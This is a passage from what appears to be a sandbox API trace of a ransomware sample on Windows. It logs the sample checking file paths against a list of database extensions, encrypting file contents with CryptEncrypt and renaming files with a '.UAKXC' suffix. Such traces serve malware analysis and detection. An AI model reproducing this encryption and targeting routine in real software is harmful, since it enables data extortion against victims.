lpSrch=".fp7") returned 0x0 [0141.253] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0141.253] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".frm") returned 0x0 [0141.253] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0141.253] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0141.253] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0141.253] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0141.253] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".his") returned 0x0 [0141.253] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".ib") returned 0x0 [0141.253] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".idb") returned 0x0 [0141.253] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0141.253] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0141.253] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".itw") returned 0x0 [0141.253] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".jet") returned 0x0 [0141.253] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0141.253] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.253] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0141.253] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0141.253] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0141.253] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0141.253] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0141.253] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".maf") returned 0x0 [0141.253] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".maq") returned 0x0 [0141.254] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".mar") returned 0x0 [0141.254] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".mas") returned 0x0 [0141.254] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".mav") returned 0x0 [0141.254] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0141.254] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0141.254] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0141.254] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0141.254] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".mud") returned 0x0 [0141.254] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0141.254] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".myd") returned 0x0 [0141.254] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0141.254] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0141.254] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0141.254] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0141.254] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0141.254] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0141.254] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0141.254] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".nv") returned 0x0 [0141.254] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0141.254] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0141.254] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0141.254] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".odb") returned 0x0 [0141.254] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0141.254] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".orx") returned 0x0 [0141.255] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".owc") returned 0x0 [0141.255] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".p96") returned 0x0 [0141.255] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".p97") returned 0x0 [0141.255] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".pan") returned 0x0 [0141.255] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0141.255] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0141.255] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0141.255] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".qry") returned 0x0 [0141.255] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0141.255] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0141.255] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0141.255] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".rod") returned 0x0 [0141.255] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0141.255] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0141.255] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0141.255] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0141.255] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0141.255] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".scx") returned 0x0 [0141.256] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0141.256] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0141.256] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0141.256] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".sis") returned 0x0 [0141.256] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".spq") returned 0x0 [0141.256] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".sql") returned 0x0 [0141.256] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0141.256] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0141.256] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0141.256] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".te") returned 0x0 [0141.256] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".temx") returned 0x0 [0141.256] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0141.256] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".tps") returned 0x0 [0141.256] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".trc") returned 0x0 [0141.256] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".trm") returned 0x0 [0141.256] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".udb") returned 0x0 [0141.256] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".udl") returned 0x0 [0141.256] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".usr") returned 0x0 [0141.256] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".v12") returned 0x0 [0141.256] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".vis") returned=".VISIO.SHAPESHEET.14.1033.hxn" [0141.256] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.256] WriteFile (in: hFile=0x6c4, lpBuffer=0x3abfd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x3abfc78, lpOverlapped=0x0 | out: lpBuffer=0x3abfd70*, lpNumberOfBytesWritten=0x3abfc78*=0x20c, lpOverlapped=0x0) returned 1 [0141.258] WriteFile (in: hFile=0x6c4, lpBuffer=0x3abfc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x3abfc7c, lpOverlapped=0x0 | out: lpBuffer=0x3abfc80*, lpNumberOfBytesWritten=0x3abfc7c*=0xa, lpOverlapped=0x0) returned 1 [0141.258] SetEndOfFile (hFile=0x6c4) returned 1 [0141.258] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.258] ReadFile (in: hFile=0x6c4, lpBuffer=0x5030000, nNumberOfBytesToRead=0x188, lpNumberOfBytesRead=0x3abfc88, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc88*=0x188, lpOverlapped=0x0) returned 1 [0141.258] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0xfffffe78, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.259] WriteFile (in: hFile=0x6c4, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x188, lpNumberOfBytesWritten=0x3abfc44, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc44*=0x188, lpOverlapped=0x0) returned 1 [0141.259] CloseHandle (hObject=0x6c4) returned 1 [0141.264] GetProcessHeap () returned 0xea0000 [0141.264] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef34d0 [0141.264] lstrcpyW (in: lpString1=0xef34d0, lpString2="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" [0141.264] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.UAKXC" [0141.264] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.shapesheet.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.visio.shapesheet.14.1033.hxn.uakxc")) returned 1 [0141.265] GetProcessHeap () returned 0xea0000 [0141.265] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef34d0 | out: hHeap=0xea0000) returned 1 [0141.265] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeddc30 | out: hHeap=0xea0000) returned 1 [0141.265] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef26f0 | out: hHeap=0xea0000) returned 1 [0141.265] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0141.265] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0141.265] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0141.265] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_prm.14.1033.hxn")) returned 0x2022 [0141.267] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_prm.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0141.267] GetLastError () returned 0x0 [0141.267] GetFileSizeEx (in: hFile=0x6c4, lpFileSize=0x3abfc88 | out: lpFileSize=0x3abfc88*=350) returned 1 [0141.267] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0141.267] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0141.267] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0141.267] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0141.267] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".accde") returned 0x0 [0141.267] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0141.267] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0141.267] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".accft") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".adb") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".ade") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".adf") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".adp") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".arc") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".ora") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".alf") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".ask") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".btr") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".cat") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".cma") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".dad") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".db") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".db3") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0141.268] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".dct") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".eco") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".edb") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".epim") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".exb") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".fic") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".fol") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0141.269] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".frm") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0141.270] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0141.270] StrStrIW 